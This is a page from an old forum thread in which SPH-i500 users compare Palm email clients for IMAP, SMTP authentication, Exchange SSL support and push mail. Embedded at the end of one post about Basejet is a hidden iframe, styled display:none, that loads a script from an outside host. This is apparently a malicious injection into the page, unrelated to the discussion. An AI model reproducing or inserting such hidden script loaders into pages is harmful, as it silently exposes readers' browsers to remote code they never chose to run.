+ Reply to Thread
Page 5 of 6 FirstFirst 1 2 3 4 5 6 LastLast

delete from Palm when delete from server?

I hope someone can clarify. I want to use a Palm app that, when I delete from the server using desktop software, my next Palm send/receive automatically deletes from Palm inbox (when it doesn't find it on the server anymore). I'm using Exchange server with POP/SMTP/IMAP available on it. Business Connection and Treo Mail (which doesn't work on SPH-i500) do this. Eudora, for example, does not, unless I configured it wrong. SnapperMail, last time I tried it, also does not do this.

basejet does this. (BUT you have to run the client on your desktop..)
    -mark

Re: delete from Palm when delete from server?

Originally posted by rocky
    I hope someone can clarify. I want to use a Palm app that, when I delete from the server using desktop software, my next Palm send/receive automatically deletes from Palm inbox (when it doesn't find it on the server anymore). I'm using Exchange server with POP/SMTP/IMAP available on it. Business Connection and Treo Mail (which doesn't work on SPH-i500) do this. Eudora, for example, does not, unless I configured it wrong. SnapperMail, last time I tried it, also does not do this.
    Eudora claims to do this when configured properly, I thought.

Also, any IMAP based email program should do this. PapiMail and OneTouch Mail and VersaMail all have IMAP support (Eudora, Snappermail and most others do not). However, If your exchange admin has SSL and TLS security turned on, and it is using a self-signed security certificate, you may be out of luck (as I am). I've only successfully gotten Eudora to work in this configuration (Snappermail and Papi and One Touch and others have SSL support but either don't suport STARTLS or don't support self-signed certificates). VersaMail may but only on PalmOS 5.1 and later.

Re: Re: delete from Palm when delete from server?

Originally posted by robo45h
    Eudora claims to do this when configured properly, I thought.

Also, any IMAP based email program should do this. PapiMail and OneTouch Mail and VersaMail all have IMAP support (Eudora, Snappermail and most others do not). However, If your exchange admin has SSL and TLS security turned on, and it is using a self-signed security certificate, you may be out of luck (as I am). I've only successfully gotten Eudora to work in this configuration (Snappermail and Papi and One Touch and others have SSL support but either don't suport STARTLS or don't support self-signed certificates). VersaMail may but only on PalmOS 5.1 and later.
    I just installed SnapperMail, deleted from server with desktop, then did Send/Fetch from Palm. Deleted message still shows up in Palm inbox. Was there a particular setting I should have set?

The Dawn of SmartPhones Tony_ensemble's Avatar
    My network does not support Clear Text passwords. Do any of the mail programs have this?
    The Saxon word for depression can be literally translated as "without beer", proving again that the Vikings were the pinnacle of all humankind.

diomark,

Did you ever figure out what was making Basejet crash on the i500? I want to evaluate the server version for Exchange also. I have emailed them for an eval, but no response. It looks like the download on the site is not the server version.

DWCT

I'm actually not using the server version (using the client-on-desktop version..)

Seems to crash frequently if I'm *on* the phone and checking a message.. (happened twice so far..)

Good news is that it doesn't drop the phone call - just gives a fatal error but the phone keeps working until you restart.
    -mark

Originally posted by DWCT
    diomark,

Did you ever figure out what was making Basejet crash on the i500? I want to evaluate the server version for Exchange also. I have emailed them for an eval, but no response. It looks like the download on the site is not the server version.

DWCT

Need E-mail with IMAP and SMTP authentication

What's the best e-mail software anyone is using on the i500?

It needs IMAP and I need SMTP authentication.

I've tried several programs but if the send well they don't recieve well and vice versa... It's possible I misconfigured one (or two) so a reccomendation would make me retry an app (or three).

I'll even take just IMAP suggestions, I can test the authentication...

Thanks,
    Gary

Well, first off, you might want to search around this forum for threads where this has already been discussed. There are threads in Treocentral as well. And there are websites devoted to this (Google).

Now, given how much discussion there is, the answer should start to become clear. Palm email software is not mature yet. "Connected" Palms are really a rather new thing in comparrison to how long the Palm itself has been around. And Palm.net doesn't count as a startingpoint.

That said, I have bad news for you. Especially if your company is running an MS Exchange server with SSL security. You're probably out of luck if you want IMAP and sending capabilities. Exchange servers (surprise) do things differently. Like typically requiring encrypted passwords and STARTLS even though an SSL tunnel is already in place. And their proprietary authentication "NTLS" I believe.

PapiMail supports SSL and IMAP but their implementors did a brain-dead thing: they only accept "root" security certificates; they don't accept self-signed certificates.

There are only a few IMAP-supporting clients, and most don't support SSL. iambic and OneTouch, for instance.

MultiMail is dead; it is now Palm's VersaMail and there is no trial versoin. Worse, it only supports SSL on Palm OS 5.? and later. Typical vendor stupidity. If MultiMail was still an independant offering, they'd have supported earlier PalmOSes because they would be more tuned to the market.

Turning to POP email clients (UGH! Can you say "mark all your email as read on the server even though you didn't read it?" I knew you could.), Eudora (free) and SnapperMail are the premier SSL-capable clients.

I have successfully accessed our corporate MS Exchange server using SSL and POP using both Eudora and SnapperMail. SnapperMail generally has the nicer interface. But I could not successfully send SMTP mail using either program through our Exchange server! I suspect it's the NTLS and STARTTLS stuff, but without a "sniffer" program like Ethereal for the Palm, I don't know; the email client logging is insufficient and I don't have access to the corporate email server.

My workaround, for now, is to set up my "Send mail" to send mail via the Sprint PCS Vision email SMTP server but with a spoofed "From" address (which it specifically allows for this reason). But this means the email does not show up in my Exchange "Sent" folder because it wasn't sent through Exchange. Now, if we were using IMAP, the client could copy it to the Sent folder itself, which would be a slick workaround. But of course, we're using POP.

Bleh.

There are web-based email aggregation services like GopherKing that support IMAP, but I don't like that route. Plus GopherKing didn't work well for me. No matter what I did, it refused to focus on my personal Exchange folders and would apparently silently barf on the huge list of public folders available on our Exchange server.

Well, first off, you might want to search around this forum for threads where this has already been discussed. There are threads in Treocentral as well.
    Actually there is very little in this forum (i500) if you search for IMAP. Since I'm not looking for any e-mail client, I need IMAP with SMTP authentication (and I don't think it requires SSL).

Most of the threads that contain the word IMAP are generally someone asking someone else "do you need IMAP?" because they didn't clarify their needs. Others are someone saying that software is supposed to support it, but no indication if they actually tried it. Plus I've used some software that just doesn't work the same on both platforms so I specifically wanted an answer with someone who has had it work on the i500.

I tried Papi and whenever I think it's fine I acts up on me. Iambic sent fine for me, but I couldn't get it to check. I'll try and check out OneTouch. Thanks!

Anyone others?
    Gary

I'm just trying to get mail from MailBlocks.com which does an excellent job filering mail BUT only supports IMAP.
    Last edited by garylapointe; 08-17-2003 at 03:03 PM.

Basejet is my favorite; eudora also handles imap.,
    -m

Well, first off, you might want to search around this forum for threads where this has already been discussed. There are threads in Treocentral as well. And there are websites devoted to this (Google).

Now, given how much discussion there is, the answer should start to become clear. Palm email software is not mature yet. "Connected" Palms are really a rather new thing in comparrison to how long the Palm itself has been around. And Palm.net doesn't count as a startingpoint.

That said, I have bad news for you. Especially if your company is running an MS Exchange server with SSL security. You're probably out of luck if you want IMAP and sending capabilities. Exchange servers (surprise) do things differently. Like typically requiring encrypted passwords and STARTLS even though an SSL tunnel is already in place. And their proprietary authentication "NTLS" I believe.

PapiMail supports SSL and IMAP but their implementors did a brain-dead thing: they only accept "root" security certificates; they don't accept self-signed certificates.

There are only a few IMAP-supporting clients, and most don't support SSL. iambic and OneTouch, for instance.

MultiMail is dead; it is now Palm's VersaMail and there is no trial versoin. Worse, it only supports SSL on Palm OS 5.? and later. Typical vendor stupidity. If MultiMail was still an independant offering, they'd have supported earlier PalmOSes because they would be more tuned to the market.

Turning to POP email clients (UGH! Can you say "mark all your email as read on the server even though you didn't read it?" I knew you could.), Eudora (free) and SnapperMail are the premier SSL-capable clients.

I have successfully accessed our corporate MS Exchange server using SSL and POP using both Eudora and SnapperMail. SnapperMail generally has the nicer interface. But I could not successfully send SMTP mail using either program through our Exchange server! I suspect it's the NTLS and STARTTLS stuff, but without a "sniffer" program like Ethereal for the Palm, I don't know; the email client logging is insufficient and I don't have access to the corporate email server.

My workaround, for now, is to set up my "Send mail" to send mail via the Sprint PCS Vision email SMTP server but with a spoofed "From" address (which it specifically allows for this reason). But this means the email does not show up in my Exchange "Sent" folder because it wasn't sent through Exchange. Now, if we were using IMAP, the client could copy it to the Sent folder itself, which would be a slick workaround. But of course, we're using POP.

Bleh.

There are web-based email aggregation services like GopherKing that support IMAP, but I don't like that route. Plus GopherKing didn't work well for me. No matter what I did, it refused to focus on my personal Exchange folders and would apparently silently barf on the huge list of public folders available on our Exchange server.

Originally posted by diomark
    Basejet is my favorite; eudora also handles imap.,
    -m
    Eudora for the palm handles IMAP?!?

Which version? and of course where can I get it!

Thanks,
    Gary

ARGH; sorry; it doesn't.. (for some reason I remembered it supporting it...)
    -mark

Basejet does though, and you have the option of running it in standalone mode.. (vs. sync'ing w/ basejet server/workstation server)
    -m

ARGH; sorry; it doesn't.. (for some reason I remembered it supporting it...)
    -mark

VersaMail

I once evaluated several mail packages available.

My needs were:

1) Must support IMAP (not just POP). IMAP truely allows for subjects to be download and retrieval of the body is optional. POP doesn't support this (though I did find clients that "kludged" the feature by aborting the download after the first few bytes in an attempt to just grab the headers). For light-weight mail reading (e.g. on a phone), IMAP is the only way to go.

2) Must support ESMTP Auth. With todays' SPAM problem being what it is, there are virtually no message gateways that will relay mail from an address that doesn't appear to be "local". Since the phone is obviously not "local", I found that sending always failed for all clients & gateways that I tested. SOME gateways support ESMTP Auth. This is an extension of basic SMTP except that it can authenticate the sender. If the sender has a valid mailbox name & password on that service, it WILL accept and forward the mail.

I find that VersaMail handles all of this quite well. IMAP (and POP, though I would never use POP myself), ESMTP Auth, multi-mailbox support, automatic periodic checking, can view HTML-formatted messages, etc.

It was $35 (if I remember), but it works quite well.

Regards
    Tim

Basejet does though, and you have the option of running it in standalone mode.. (vs. sync'ing w/ basejet server/workstation server)
    -m
    Hmm. I'll have to look at Basejet again. I don't recall it being available as a standlone product; just for use with their service, or with a "forwarding client" running on your PC --like SprintPCS Business Connection Personal Edition. Useless to me.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Originally posted by garylapointe
    ... Since I'm not looking for any e-mail client, I need IMAP with SMTP authentication (and I don't think it requires SSL). ...
    As recommended elsewhere, if you don't need SSL, VersaMail is probably your best bet.

Big problem: they don't offer a trial version. You have to buy it. Let me know if you manage to find out if you can return it if it doesn't work to your liking.

im a newbie here... but have spent hours enjoying all of the i-5 user tips and comments - ive know more about this phone than i do about myself!

i was surprised however that no one in this thread has commented on the pros and cons of aileron mail from corsoft.com.

i tried it a month ago and have been evaluating other clients since then. while i dont need imap support, i think it does support it(?) im no techie so dont take my word for it.

if anyone else has tried aileron, id be interested in your opinion.

btw i have also been demo-ing snapper which is great, however one advantage aileron seems to have is that it never downloads the same header more than once unless you have deleted it from your handheld. i believe this was an issue for the user w/1700 emails in his inbox (eee gads!!)

Originally posted by ajn3323
    im a newbie here... but have spent hours enjoying all of the i-5 user tips and comments - ive know more about this phone than i do about myself!

i was surprised however that no one in this thread has commented on the pros and cons of aileron mail from corsoft.com.

i tried it a month ago and have been evaluating other clients since then. while i dont need imap support, i think it does support it(?) im no techie so dont take my word for it.

if anyone else has tried aileron, id be interested in your opinion.

btw i have also been demo-ing snapper which is great, however one advantage aileron seems to have is that it never downloads the same header more than once unless you have deleted it from your handheld. i believe this was an issue for the user w/1700 emails in his inbox (eee gads!!)
    Aileron does not support push on i500. That is a dealbreaker, IMHO.

rocky is right

No push mail is a deal breaker. Basejet is the best out there right now. It pushes the mail almost instantly. Build 52 released on 12/31/03 has some issues which they have fixed and will be released shortly. For the most part, however, the instantaneous push makes it the best out there even with the its current issues. If you go to their website and check out their support database you can see the discussions on current issues being fixed.